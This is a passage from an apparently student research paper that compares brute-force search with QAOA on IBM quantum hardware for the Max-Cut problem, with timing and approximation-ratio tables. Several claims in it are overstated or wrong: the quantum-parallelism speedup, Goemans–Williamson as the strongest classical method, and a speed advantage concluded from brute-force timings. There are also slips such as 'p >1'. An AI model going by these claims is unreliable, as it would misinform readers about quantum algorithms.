<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="648" height="186" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM.png" alt="" class="wp-image-4582" style="width:260px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM.png 648w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM-300x86.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM-230x66.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM-350x100.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM-480x138.png 480w" sizes="(max-width: 648px) 100vw, 648px" /></figure>



<p>For each edge (i,j)  connecting vertices x<sub>i</sub>  and x<sub>j </sub> , if vertices x<sub>i</sub>  and x<sub>j </sub> are in the same subset, their product will be equal to 1, and since 1 – 1 = 0, the edge connecting x<sub>i</sub>  and x<sub>j </sub> is not cut and it will not contribute to the cut value of  G. If x<sub>i</sub>  and x<sub>j </sub> are in two different subsets, their product will be equal to -1, and since 1 – -1 = 2, the edge connecting x<sub>i</sub>  and x<sub>j </sub> is cut and it will contribute to the cut value of  G (Lowe, 2025). Each existing vertex combination (x<sub>i</sub> , x<sub>j</sub>) in G is considered twice: once for (x<sub>i</sub> , x<sub>j</sub>)  and the other for (x<sub>j</sub> , x<sub>i</sub>)  because technically, they are not exactly the same vertex combination. However, in actuality, they connect the same edge, so to avoid such double counting, the total cut value after iterating after summing through every valid vertex combination is divided by 2. Therefore,  C(x) calculates the total cut value of graph G  , which is the same as calculating the maximum possible cut value for G  , which fulfills the objective of the Max-Cut problem.</p>



<p>Each vertex can be in one of two possible subsets. Because of this, the solution space of graph G  , or total number of possible partitions is 2<sup>n</sup> , where  <em>n</em>  represents the number of vertices in G . Therefore, as the value of n  increases, the number of possible partitions increases exponentially, which starts to become infeasible after a certain point, especially for large values of  , because the time and resources required to iterate over all 2<sup>n</sup>   possible combinations become too large. This is why the function encoded by C(x)  is NP-hard, due to which almost all algorithms created to attempt a solution at the Max-Cut problem are approximation algorithms. These are designed to produce near-optimal solutions within reasonable time limits, rather than iterating over all 2<sup>n</sup>  possible partitions, which is known as the brute force method – theoretically the only algorithm with an approximation ratio of 1.</p>



<p>One of the simplest classical approximation approaches is using a greedy algorithm (Codecademy, 2022), which is a technique that assigns vertices to the set that yields the largest ‘immediate’ increase in the cut size. Due to this aspect, despite their speed, greedy approaches often get stuck in locally optimal configurations that are not globally optimal. A significantly more powerful classical approach is the Goemans–Williamson algorithm (Cai, 2003), which uses a mathematical technique called semidefinite programming (SDP) to represent vertices as unit vectors on a hypersphere followed by randomized rounding to generate a cut. This is the most powerful classical approximation algorithm and is guaranteed to achieve an approximation ratio of at least 0.878, that is, to produce a cut that is guaranteed to be at least 87.8% as good as the optimal cut value, regardless of graph size.</p>



<p>Although such classical approximation algorithms are considerably efficient, their performance starts to diminish for very large or dense graphs, motivating research on alternative methods – quantum methods.</p>



<h4 class="wp-block-heading"><strong>Introduction to Quantum Computing – For the Max-Cut Problem</strong></h4>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="750" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-1024x750.png" alt="" class="wp-image-4585" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-1024x750.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-300x220.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-768x562.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-1000x732.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-230x168.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-350x256.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-480x352.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM.png 1218w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>When multiple qubits are combined, they can represent an exponentially large number of possible states at the same time. This means that for a system with   qubits, its state can be described by a complex state vector in a 2<sup>n</sup> -dimensional space. This property of superposition (Thomson, 2025) of a quantum state is extremely valuable as it enables it to represent all 2<sup>n</sup>  basis states. Such simultaneous representation makes quantum parallelism – the ability of a single operation (in this case, a unitary operation) to act on all superimposed states at the same time – possible (Kaye &amp; Mosca, 2020), which is the very thing that gives quantum computing the edge over classical computing: While a classical computer must check all 2<sup>n</sup>  possible combinations one at a time, a quantum computer can describe them all as a superposition of states representing those combinations using a compound state vector and manipulate them all in parallel.</p>



<p>Quantum computers also use a phenomenon known as entanglement, in which two or more quantum particles – in this case, qubits – share a quantum state over space, causing the individual state of one particle affecting the individual states of the other entangled particles regardless of the distance between them. This link between qubits serves numerous functions in quantum computing. Thus, superposition and entanglement allow quantum computers to explore multiple possible solutions – and if housed with enough qubits, the entire solution space – simultaneously with much fewer resources and at exponentially faster speeds than classical computers, making quantum algorithms superior for solving NP-hard problems such as the Max-Cut problem even though they are still not fully accurate like the brute force method (Preskill, 2018).</p>



<h4 class="wp-block-heading"><strong>The Quantum Approximate Optimization Algorithm (QAOA)</strong></h4>



<p>The Quantum Approximate Optimization Algorithm, or QAOA, is an esteemed hybrid (using classical and quantum computing) algorithm that specializes in finding approximate solutions to combinatorial optimization problems like the Max-Cut problem that are classically infeasible (Blekos et al., 2023). It works by alternating between two Hamiltonian operators. In simple terms, the Hamiltonian is a quantum operator that represents the total energy of a system (Agarapu, 2024).</p>



<p>The first one is known as the ‘Cost Hamiltonian’ (EITCA, 2024). It is based on the objective function of the Max-Cut problem and assigns energy levels to different possible solutions, with lower energy levels corresponding to better cut values. After applying the Cost Hamiltonian to the initial quantum state, the resultant state is biased towards generally good solutions (not the best ones), so it can get stuck in a part of the solution space that has a low energy level (EITCA, 2024). This is where the second one, known as the ‘Mixer Hamiltonian’ (EITCA, 2024), comes in. It “mixes” the quantum state by flipping qubits in a way that causes amplitudes between different energy levels to get mixed up, creating newer superpositions of states, allowing a greater exploration of the solution space and consequently increasing the chance of finding better solutions. These operators are then repeated for &nbsp; layers, where &nbsp;is the depth of the quantum circuit.</p>



<p>Each layer is parameterized by angles   (parameter of  Cost Hamiltonian) and k (parameter of Mixer Hamiltonian), where   is the current layer. These angles are optimized using classical optimization techniques (Ivezic, 2024) and are then used in the next layer to improve the performance of the Hamiltonians to reach even lower energy levels. So, theoretically, as the depth of the circuit (measured in  layers) moves closer to infinity, QAOA moves closer to the lowest energy level of the Cost Hamiltonian, closer to the perfect approximation ratio of 1, and thus, closer to the exact solution to the Max-Cut problem for graph  . This hybrid approach makes QAOA suitable for today’s noisy, small-scale NISQ quantum devices, which is why it is one of the most successful quantum approximation algorithms to solving the Max-Cut problem</p>



<h4 class="wp-block-heading"><strong>Limitations of Quantum Approaches</strong></h4>



<p>Although mathematical quantum approaches like QAOA are elegantly promising, their performance is limited by modern quantum hardware. Quantum computers are considerably noisy, resulting in qubits’ states being disturbed and therefore losing information (Preskill, 2018) through a process known as decoherence (Bacon, 2003), causing the solution quality to be degraded. The greater the qubit count, the greater the capabilities of quantum hardware are but also the chance of decoherence. Additionally, most devices have a limited number of qubits – under 200 – and restricted qubit connectivity due to suboptimal qubit quality (Preskill., 2018) (Swayne, 2024), which can make running larger quantum circuits quite inefficient. This also prevents true ‘fault-tolerant’ quantum computing&nbsp; (Davis et al., 2025) utilizing consistent real-time error correction from being possible, meaning that QAOA has the unwanted capability of accumulating noise over time.</p>



<p>Because of these constraints, experiments involving QAOA usually focus on very small graphs and circuits that have a very limited depth, which is why they cannot be scaled to large problem sizes (Lotshaw et al., 2022). These limitations mean that while quantum computers might not yet fully outperform classical algorithms on large problems, which is where they thrive compared to classical computers, studying QAOA on real devices is essential for understanding how performance scales as hardware improves.</p>



<h2 class="wp-block-heading"><strong>Methodology</strong></h2>



<p>Having developed foundations to both classical and quantum methods to solving the Max-Cut problem and established the strengths and limitations of each, the next step is to investigate how they perform in practice. This section details the methodology used to analyze, evaluate and compare the performance of the Quantum Approximate Optimization Algorithm (QAOA) against the classical brute-force method in solving instances of the Max-Cut problem. This investigation aims to look into and demonstrate how each algorithm scales as graph size and problem complexity increases and whether quantum algorithms begin to exhibit any advantages over classical algorithms as input size increases.</p>



<p>The methodology is structured into two parts. The first one outlines experimental details, including the overall set-up, graph generation, quantum hardware used, technical settings, and more for both classical and quantum solutions. The second one discusses the performance metrics used, such as execution time and approximation ratios, and explains how they are calculated.</p>



<h4 class="wp-block-heading"><strong>Experimental Details</strong></h4>



<p>The investigation uses a controlled computational set up to compare the performances of the classical brute force algorithm and QAOA in solving the Max-Cut problem. It was implemented via Python using IBM’s ‘Qiskit Runtime Service’ (version 0.42.0) and the ‘Qiskit SDK’ (version 2.1.1) to enable usage of quantum hardware and ‘Matplotlib’ (version 3.10.6) and ‘Rustworkx’ (version 0.17.1) for graph creation and computation. The quantum processor used was ‘IBM_Torino’, which houses 133 qubits. A series of unweighted graphs were created using the ‘create_sample_graph()’ function with node size ranging from 4 nodes to 24 nodes. The graphs were created as polygons with the number of vertices corresponding to the number of nodes specified, with a few edges connecting non-adjacent nodes for structural variety.</p>



<p>The Max-Cut problem was solved using two approaches: (1) a classical brute force algorithm – this is implemented in the ‘classical_max_cut_brute_force()’ function, which exhaustively went over all 2<sup>n</sup> possible vertex partitions to determine the partition resulting in the most optimal cut value. (2) QAOA –&nbsp; the QAOA circuit required to operate on is created via the ‘create_qaoa_circuit()’ function, and the algorithm is run via the ‘run_qaoa_modern()’ function that communicates with the chosen quantum device in the backend or runs the algorithm on a local Aer simulator when not selected or unavailable.</p>



<p>The QAOA implementation uses a circuit with depth being a single layer (p=1) with fixed parameters    γ =  π / 4  and β = π / 2 for cost and mixer Hamiltonians respectively, corresponding to one cost–mixer iteration. Thus, no classical optimizer has been used for this investigation. Each circuit begins with a uniform superposition of the plus state into a compound n-qubit quantum state, followed by the cost and mixer layers to encode and explore the solution space respectively, and then measured. Qubits are then mapped to the quantum device, and while the “job” (QAOA run) is not in a state of completeness/termination, it is queued on the quantum device every 10 seconds.</p>



<p>To compare both brute-force algorithm and QAOA, 5 trials were taken for each graph size (4 nodes &#8211; 24 nodes). Each trial consisted of both algorithms being run with the execution time for both and approximation ratio for QAOA being measured. The mean of all execution times of each algorithm for each graph size was then calculated, and they were plotted on a scatter plot diagram created on ‘Desmos’ expressing execution time vs. graph size for both algorithms.</p>



<h4 class="wp-block-heading"><strong>Methodological Considerations</strong></h4>



<p>Earlier, it was mentioned that the QAOA circuit has only a single cost-mixer layer (p = 1)  and therefore had no classical optimizer. These are to make the investigation easy for interpretation and reproduction so that similar results are yielded when performed by the audience and not have the complexity of the optimizer affect QAOA. However, the cost for this approach is the accuracy of the cut value.</p>



<p>For obvious reasons, the number of trials performed, 5, were for the sake of statistical accuracy and error minimization, and a graph size increment of 2 would be small enough to accurately capture the relationship between execution time and graph size for both algorithms.</p>



<p>The brute-force algorithm calculates the optimal cut value 100% of the time as it goes through every single possible combination of graph partitions. QAOA on the other hand does not because measuring a quantum circuit is probabilistic in nature, so to maintain consistency and ensure fairness in comparisons, it was run using identical circuit configurations and constant cost and mixer Hamiltonian parameters</p>



<h4 class="wp-block-heading"><strong>Performance Metrics</strong></h4>



<p>The primary measurement for algorithmic performance is execution time, which is measured using the ‘time.perf_counter()’ function from the ‘time’ module provided by Python. The function executing the brute-force algorithm for solving the Max-Cut problem – ‘classical_max_cut_brute_force()’ – only contains the necessary steps of the brute-force algorithm, so the entirety of it is measured. The function executing the QAOA for the Max-Cut problem – ‘run_qaoa_modern()’ – is only measured from circuit creation until the QAOA “job” is in state of completion/termination. The sleep time is not included as this is simply a delay added to prevent constant querying of the job status and is therefore not a part of the QAOA procedure.</p>



<p>The secondary measurement for algorithmic performance is approximation ratio. This is calculated by dividing the cut value produced from an algorithm by the optimal cut value. This practically only applies to the QAOA as the brute force algorithm always results in the optimal cut value 100% of the time, so it has an approximation ratio of 1 in all cases. It is important as it is a measure of how accurate an algorithm is, and in this case, how close the cut values it produces is to the optimal cut value. The reason it is not the primary metric is that the variable of interest is execution time, which is theorized to be a major advantage of quantum algorithms over classical ones.</p>



<h2 class="wp-block-heading"><strong>Results</strong></h2>



<p>This section presents the results of the experiment, comparing the observations for the classical and quantum algorithms used to solve the Max-Cut problem regarding the performance metrics mentioned. Note that the actual figures for the graphs will not be shown in this paper due to the sheer volume of trials and that the variable of interest is execution time, not the way the graphs are structured.</p>



<p>Below are datatables that present the execution times of both algorithms over 5 independent trials for each graph size (4 &#8211; 24 nodes) along with their respective approximation ratios relative to the optimal cut value. The first table shows the above information for the brute-force algorithm, and the second table shows the same for QAOA executed on real quantum hardware. Both have a column displaying the average execution times for each, and when talking about execution time, it is the average execution time that is being referred to (most of the time).</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td colspan="8">Table 1: Execution Time vs. Graph Size for Classical Brute-Force Algorithm</td></tr><tr><td rowspan="2"><br>Graph Size</td><td rowspan="2"><br>Max Cut Value</td><td colspan="6">Execution time (seconds)</td></tr><tr><td>Trial 1</td><td>Trial 2</td><td>Trial 3</td><td>Trial 4</td><td>Trial 5</td><td>Average</td></tr><tr><td>4 nodes</td><td>4</td><td>0.000048900</td><td>0.000068399</td><td>0.00061139</td><td>0.000047400</td><td>0.000046200</td><td>0.00016445</td></tr><tr><td>6 nodes</td><td>8</td><td>0.00013079</td><td>0.00013230</td><td>0.00013129</td><td>0.00013210</td><td>0.00011180</td><td>0.00012765</td></tr><tr><td>8 nodes</td><td>9</td><td>0.00063640</td><td>0.00098330</td><td>0.00051240</td><td>0.00056620</td><td>0.00055640</td><td>0.00065094</td></tr><tr><td>10 nodes</td><td>10</td><td>0.0034135</td><td>0.0026266</td><td>0.0021856</td><td>0.0022532</td><td>0.0016598</td><td>0.0024277</td></tr><tr><td>12 nodes</td><td>13</td><td>0.01210</td><td>0.013442</td><td>0.010271</td><td>0.0067686</td><td>&nbsp;0.0098584</td><td>0.010488</td></tr><tr><td>14 nodes</td><td>16</td><td>0.053149</td><td>0.05270</td><td>0.032454</td><td>0.032022</td><td>0.032837</td><td>0.040632</td></tr><tr><td>16 nodes</td><td>19</td><td>0.25040</td><td>0.27612</td><td>0.15549</td><td>0.15498</td><td>0.16060</td><td>0.19952</td></tr><tr><td>18 nodes</td><td>20</td><td>0.67715</td><td>0.69035</td><td>0.71505</td><td>0.71792</td><td>0.71647</td><td>0.70339</td></tr><tr><td>20 nodes</td><td>22</td><td>3.1328</td><td>3.1761</td><td>3.3504</td><td>3.3003</td><td>3.3307</td><td>3.2581</td></tr><tr><td>22 nodes</td><td>24</td><td>15.369</td><td>15.252</td><td>16.070</td><td>22.806</td><td>20.876</td><td>18.075</td></tr><tr><td>24 nodes</td><td>25</td><td>75.737</td><td>100.03</td><td>72.953</td><td>68.929</td><td>120.39</td><td>87.608</td></tr></tbody></table></figure>



<p>Table 1 displays the execution time of the classical brute-force algorithm for each graph size for all 5 trials. As expected, as the graph becomes more complex, the average runtime increases at a seemingly exponential rate, reflecting non-polynomial time complexity caused by enumerating all vertex partitions. The approximation ratio remains a constant 1.00 across all trials, which is why it is not shown in a table, confirming that the brute-force method yields the exact maximum cut.</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td colspan="8">Table 2: Execution Time vs. Graph Size for QAOA</td></tr><tr><td rowspan="2"><br>Graph Size</td><td rowspan="2"><br>Max Cut Value<br></td><td colspan="6">Execution Time</td></tr><tr><td>Trial 1</td><td>Trial 2</td><td>Trial 3</td><td>Trial4</td><td>Trial 5</td><td>Average</td></tr><tr><td>4 nodes</td><td>4</td><td>1.5329</td><td>1.8548</td><td>1.2851</td><td>1.2273</td><td>1.3695</td><td>1.45392</td></tr><tr><td>6 nodes</td><td>8</td><td>1.4679</td><td>1.4042</td><td>1.2365</td><td>1.3553</td><td>1.3079</td><td>1.35436</td></tr><tr><td>8 nodes</td><td>9</td><td>1.5522</td><td>1.1189</td><td>1.2144</td><td>1.2766</td><td>1.8764</td><td>1.4077</td></tr><tr><td>10 nodes</td><td>10</td><td>1.3079</td><td>1.2546</td><td>1.1543</td><td>1.2795</td><td>1.2578</td><td>1.25082</td></tr><tr><td>12 nodes</td><td>13</td><td>1.4196</td><td>1.3601</td><td>1.3318</td><td>1.3898</td><td>1.1510</td><td>1.33046</td></tr><tr><td>14 nodes</td><td>16</td><td>1.2429</td><td>1.1418</td><td>1.3929</td><td>1.4978</td><td>1.3784</td><td>1.33076</td></tr><tr><td>16 nodes</td><td>19</td><td>1.3868</td><td>1.7303</td><td>1.2675</td><td>1.2200</td><td>1.2308</td><td>1.36708</td></tr><tr><td>18 nodes</td><td>20</td><td>1.8422</td><td>1.6108</td><td>1.3401</td><td>1.1964</td><td>1.2257</td><td>1.44304</td></tr><tr><td>20 nodes</td><td>22</td><td>1.5191</td><td>1.7161</td><td>1.1193</td><td>1.2715</td><td>1.1607</td><td>1.35734</td></tr><tr><td>22 nodes</td><td>24</td><td>1.4184</td><td>1.5857</td><td>1.2135</td><td>1.8770</td><td>1.1747</td><td>1.45386</td></tr><tr><td>24 nodes</td><td>25</td><td>1.6708</td><td>1.8790</td><td>1.2972</td><td>1.1811</td><td>1.3207</td><td>1.46976</td></tr></tbody></table></figure>



<p>Table 2 presents the execution time of the QAOA for each graph size for all 5 trails. Contrary to the assumptions made earlier in the paper, which stated that execution time increases at a linear rate as graph size increases, they (the average) seem to fluctuate within a certain range of values as graph size increases with no discernable trend.</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td colspan="8">Table 3: Approximation Ratio vs. Graph Size for QAOA</td></tr><tr><td rowspan="2"><br>Graph Size</td><td rowspan="2"><br>Max Cut Value<br></td><td colspan="6">Approximation Ratio</td></tr><tr><td>Trial 1</td><td>Trial 2</td><td>Trial 3</td><td>Trial4</td><td>Trial 5</td><td>Average</td></tr><tr><td>4 nodes</td><td>4</td><td>0.750</td><td>1.00</td><td>1.00</td><td>1.00</td><td>1.00</td><td>0.95</td></tr><tr><td>6 nodes</td><td>8</td><td>0.625</td><td>0.625</td><td>1.00</td><td>0.625</td><td>0.625</td><td>0.7</td></tr><tr><td>8 nodes</td><td>9</td><td>0.778</td><td>0.778</td><td>0.556</td><td>0.778</td><td>0.667</td><td>0.7114</td></tr><tr><td>10 nodes</td><td>10</td><td>0.800</td><td>0.600</td><td>0.800</td><td>0.800</td><td>0.800</td><td>0.76</td></tr><tr><td>12 nodes</td><td>13</td><td>0.692</td><td>0.692</td><td>0.846</td><td>0.615</td><td>0.846</td><td>0.7382</td></tr><tr><td>14 nodes</td><td>16</td><td>0.750</td><td>0.500</td><td>0.625</td><td>0.688</td><td>0.688</td><td>0.6502</td></tr><tr><td>16 nodes</td><td>19</td><td>0.684</td><td>0.632</td><td>0.684</td><td>0.579</td><td>0.632</td><td>0.6422</td></tr><tr><td>18 nodes</td><td>20</td><td>0.65</td><td>0.700</td><td>0.550</td><td>0.650</td><td>0.700</td><td>0.65</td></tr><tr><td>20 nodes</td><td>22</td><td>0.591</td><td>0.591</td><td>0.591</td><td>0.727</td><td>0.591</td><td>0.6182</td></tr><tr><td>22 nodes</td><td>24</td><td>0.708</td><td>0.542</td><td>0.667</td><td>0.625</td><td>0.583</td><td>0.625</td></tr><tr><td>24 nodes</td><td>25</td><td>0.680</td><td>0.056</td><td>0.680</td><td>0.560</td><td>0.600</td><td>0.5152</td></tr></tbody></table></figure>



<p>Table 3 presents the approximation ratios (relative to the optimal cut value) of the QAOA runs for each graph size for all 5 trails. Here, it can be seen that the average execution time decreases as graph size increases, showing that the algorithm becomes less accurate as complexity increases. Potential reasons for this will be explored in the next section.</p>



<p>Now, the results of Table 1 and Table 2 have been plotted on a scatter plot diagram below showing execution time vs. graph size for both algorithms to illustrate the trend of their behavior regarding the same and provide a visual&nbsp; representation of the scalability advantages of quantum algorithms for problems like the Max-Cut.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="884" height="926" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-34.png" alt="" class="wp-image-4586" style="width:592px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-34.png 884w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-34-286x300.png 286w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-34-768x804.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-34-230x241.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-34-350x367.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-34-480x503.png 480w" sizes="(max-width: 884px) 100vw, 884px" /></figure>



<p>From the graph, it can be seen that the execution time for the brute-force solution shows exponential growth, whereas the execution time for the QAOA solution shows an almost flat linear model. At around 19 nodes, both algorithms’ average execution time curves intersect, after which the classical brute-force solution’s execution time exceeds that of the QAOA solution. This visual representation makes it even clearer how quickly the brute-force algorithm becomes more and more unscalable after a certain point, unlike the QAOA, which, although less accurate, seems to stay relatively constant regarding execution time. Note that the datapoint for ‘24 nodes’ for the brute-force solution is not shown as including it would make the fluctuations of the QAOA solution datapoints almost impossible to discern and the gap between both the curves before they intersect would be very small to see.</p>



<h2 class="wp-block-heading"><strong>Discussion</strong></h2>



<p>This section analyzes the results obtained from the comparison between the classical brute-force algorithm and the QAOA in solving the Max-Cut problem. The discussion evaluates the observed trend between execution time and graph size for both algorithms, analyzes fluctuations and deviations from expected theoretical behavior, and explores the trend of the approximation ratio as graph size increases. It further investigates the causes of these trends, linking them to both algorithmic configurations and hardware limitations of the modern-day Noisy Intermediate-Scale Quantum (NISQ) devices (Mahmoud, 2021).</p>



<p>The execution time vs. graph size model derived from the data tables in the previous section shows a strong contrast between the trends of both algorithms. As expected, the classical brute-force solution shows an exponential growth in execution time as the number of vertices increases. This trend is consistent with the theory behind it, where every possible partition of vertices into two sets must be evaluated to deduce the optimal cut value. For small graphs (4–12 nodes), the execution time remains quite short, but as the graph size approaches 20–24 nodes, execution time grows dramatically due to the nature of an exponential function, quickly rendering brute-force computations infeasible on standard hardware. This rapid exponential escalation illustrates why NP-hard problems like the Max-Cut cannot have efficient classical solutions (solutions with polynomial time complexity), due to which they become completely infeasible for complex problems, underscoring the need for exploring quantum approaches that can theoretically have efficient solutions.</p>



<p>However, the QAOA solution displays a very different trend. Rather than growing exponentially with problem size, the execution times show an almost linear trend, fluctuating within a relatively narrow range, appearing almost constant across the entire set of tested graph sizes. This outcome contrasts that of QAOA (theoretically), which should show an approximately increasing linear trend with the number of qubits (and therefore graph size) increasing for a fixed circuit depth (p = 1) . The observed stability rather than increase and the randomness in runtime causing such fluctuations can be explained by a combination of quantum hardware behavior and implementation-level constraints. First, the QAOA code used in this experiment employs a fixed circuit depth and fixed Hamiltonian parameters γ = π/4 and  β = π/2  . Because circuit depth, (consequently) gate count, and parameters remain constant, with no classical optimizer used to manipulate the parameters, the computational workload submitted to the 133-qubit ‘IBM_torino’ quantum device does not increase meaningfully with graph size within the tested range as there are enough qubits to encapsulate the entirety of the solution space all at once. The quantum processing time per circuit therefore remains nearly unchanged as graph size increases for those in the tested range, with small fluctuations attributable to backend scheduling variation, noise etc. In a practical setting, the Max-Cut problem is usually implemented with hundreds or even thousands of nodes, which are almost always greater than the qubit count, leading to increased processing time per circuit as graph size increases. Thus, under ideal, low-noise, and with a greater circuit depth, execution time of a QAOA solution could potentially consistently be observed to increase linearly with the number of qubits (and nodes on the graph) increasing on large and complex graphs.</p>



<p>Another key observation is regarding the approximation ratio. The experimental results show a decrease in approximation ratio of the QAOA solution as graph size increases. For small graphs, QAOA often seems to result in cuts close to optimal, but for larger graphs, its performance deteriorates slightly. In this investigation, this behavior can be caused by several factors. Firstly, with a low, fixed circuit depth  (p = 1) , the QAOA has a very low chance of providing a more optimal cut value due to the parameters not being optimized enough to lead to the Cost Hamiltonian’s application resulting in a higher measurement probability for bitstrings (basis states in the solution space) representing more optimal cut values. Thus, as the graph size grows, the solution space becomes exponentially greater, and a single-layer circuit cannot adequately explore it to favor bitstrings representing good cut values consistently. This is detrimental especially when the optimal cut corresponds to a low probability event. Secondly, the fixed parameter pair (γ = π/4,  β = π/2) used in all runs, while simplifying the process, prevents dynamic tuning of the QAOA for different graph configurations, resulting in lower approximation ratios as the number of nodes (and therefore qubits) increases. Lastly, the most generic reason is noise. As the number of qubits used and operations performed increase, so does the capacity of noise in disturbing the compound quantum state the circuit is manipulating, blurring the probability distribution of basis states in the solution space, and therefore that of the measured bitstrings, resulting in suboptimal cut values.</p>



<h2 class="wp-block-heading"><strong>Implications</strong></h2>



<p>This section considers the implications of the findings and discussions based on the previous sections for scalability of classical and quantum algorithms and when exactly does practical quantum advantage for NP-hard (optimization) problems such as Max-Cut begin to show. It then validates the viability of QAOA on modern NISQ hardware and considers the potential improvements that can be observed in the future as quantum hardware advances.</p>



<p>The findings presented in the previous sections demonstrate an important advantage of executing QAOA on real quantum hardware over the classical brute-force solution: while the latter method becomes rapidly infeasible to run with scale due to its exponentially increasing execution time, QAOA maintains roughly constant or at worst sub-linear growth in execution time. Although its current implementation does not achieve better speed compared to classical computation for relatively small graphs, its scalability over medium to large sized graphs suggests potential long-term advantages. However, the trend between graph size and approximation ratio observed proves to be a hurdle in the way of accuracy. The steadily declining approximation ratio shows the effect of QAOA configurations, but most importantly, noise. Even with a near-perfect QAOA algorithm, the limitations of NISQ hardware prevent the ability to create a high-depth circuit with a high qubit count without lowering accuracy due to the prevalence of noise. This prevents the observed advantages of QAOA for solving NP-hard problems from being effective where they are required the most – on large problems, and in the case of the Max-Cut problem, on large graphs, highlighting the underlying trade-off between speed and result accuracy</p>



<h2 class="wp-block-heading"><strong>Conclusion</strong></h2>



<p>In summary, this investigation is designed to explore and demonstrate the feasibility of running QAOA for the Max-Cut problem on real quantum devices, comparing its performance against the classical brute-force method of solving the Max-Cut problem to gauge the potential advantages that quantum algorithms may provide as input size grows. The end goal is to determine when quantum algorithms start to outperform their classical counterparts.</p>



<p>The results from the experiment confirm that the classical brute-force algorithm scales exponentially with input size, becoming infeasible fairly quickly — over smaller graphs within the tested range, execution times were fairly short, but towards the end, execution times started to shoot upward at an alarmingly fast rate — whereas the QAOA solution had almost constant runtime for all graph sizes at the cost of accuracy as graph size increased. This limitation was shown by the decreasing average approximation ratio across all 5 trials as graph size increased, primarily due to a very low circuit depth (p >1)  , constant QAOA parameters, and most importantly, greater potential for noise on larger graphs, which is an issue for NISQ devices in general. Nevertheless, these findings validate the theoretical advantages that quantum algorithms outperform classical ones in terms of speed, but due to the shortcomings of NISQ hardware, they cannot fully be utilized for large problem sizes.</p>



<p>Ultimately, the insights from this investigation provide a foundation for understanding how quantum algorithms scale over problem size, bring us one step closer to realizing practical quantum advantages in solving complex NP-hard problems like Max-Cut over large problem sizes. Looking into the future, more advanced quantum hardware with larger qubit counts and lower noise levels will render increasing QAOA depth  (p>1)  feasible with little effect on accuracy, allowing for faster and more accurate solutions for the Max-Cut problem and other NP-hard problems, revolutionizing areas such as semiconductor design, image segmentation in computer vision, financial modeling and data flow optimization, which use the Max-Cut problem for various purposes.</p>



<h2 class="wp-block-heading"><strong>References</strong></h2>



<p>Agarapu, R. (2024). <em>What is Hamiltonian in quantum mechanics?</em> Online Tutorial Hub. Retrieved October 26, 2025, from <a href="https://onlinetutorialhub.com/quantum-computing-tutorials/what-is-hamiltonian-in-quantum-mechanics/">https://onlinetutorialhub.com/quantum-computing-tutorials/what-is-hamiltonian-in-quantum-mechanics/</a></p>



<p>Algor Education. (n.d.). <em>Brute Force Computing</em>. Algor Education. Retrieved October 26, 2025, from <a href="https://cards.algoreducation.com/en/content/9CDDR2hL/brute-force-computing">https://cards.algoreducation.com/en/content/9CDDR2hL/brute-force-computing</a></p>



<p>Asfaw, A., Bello, L., Ben-Haim, Y., Bravyi, S., Capelluto, L., Carrera Vazquez, A., Ceroni, J., Gambetta, J., Garion, S., Gil, L., De La Puente Gonzalez, S., McKay, D., Minev, Z., Nation, P., Phan, A., Rattew, A., Shabani, J., Smolin, J., Temme, K., … Wootton, J. (n.d.). <em>Learn Quantum Computing using Qiskit</em>. Retrieved October 26, 2025, from <a href="https://github.com/RafeyIqbalRahman/Qiskit-Textbook/blob/master/Learn%2520Quantum%2520Computing%2520using%2520Qiskit.pdf">https://github.com/RafeyIqbalRahman/Qiskit-Textbook/blob/master/Learn%20Quantum%20Computing%20using%20Qiskit.pdf</a></p>



<p>Bacon, D. M. (2003). <em>Decoherence, Control, and Symmetry in Quantum Computers</em> (Doctoral dissertation, University of California, Berkeley). arXiv:quant-ph/0305025. <a href="https://arxiv.org/pdf/quant-ph/0305025">https://arxiv.org/pdf/quant-ph/0305025</a></p>



<p>Blekos, K., Brand, D., Ceschini, A., Chou, C., Li, R., Pandya, K., &amp; Summer, A. (2023). <em>A Review on Quantum Approximate Optimization Algorithm and its Variants</em>. https://arxiv.org/pdf/2306.09198</p>



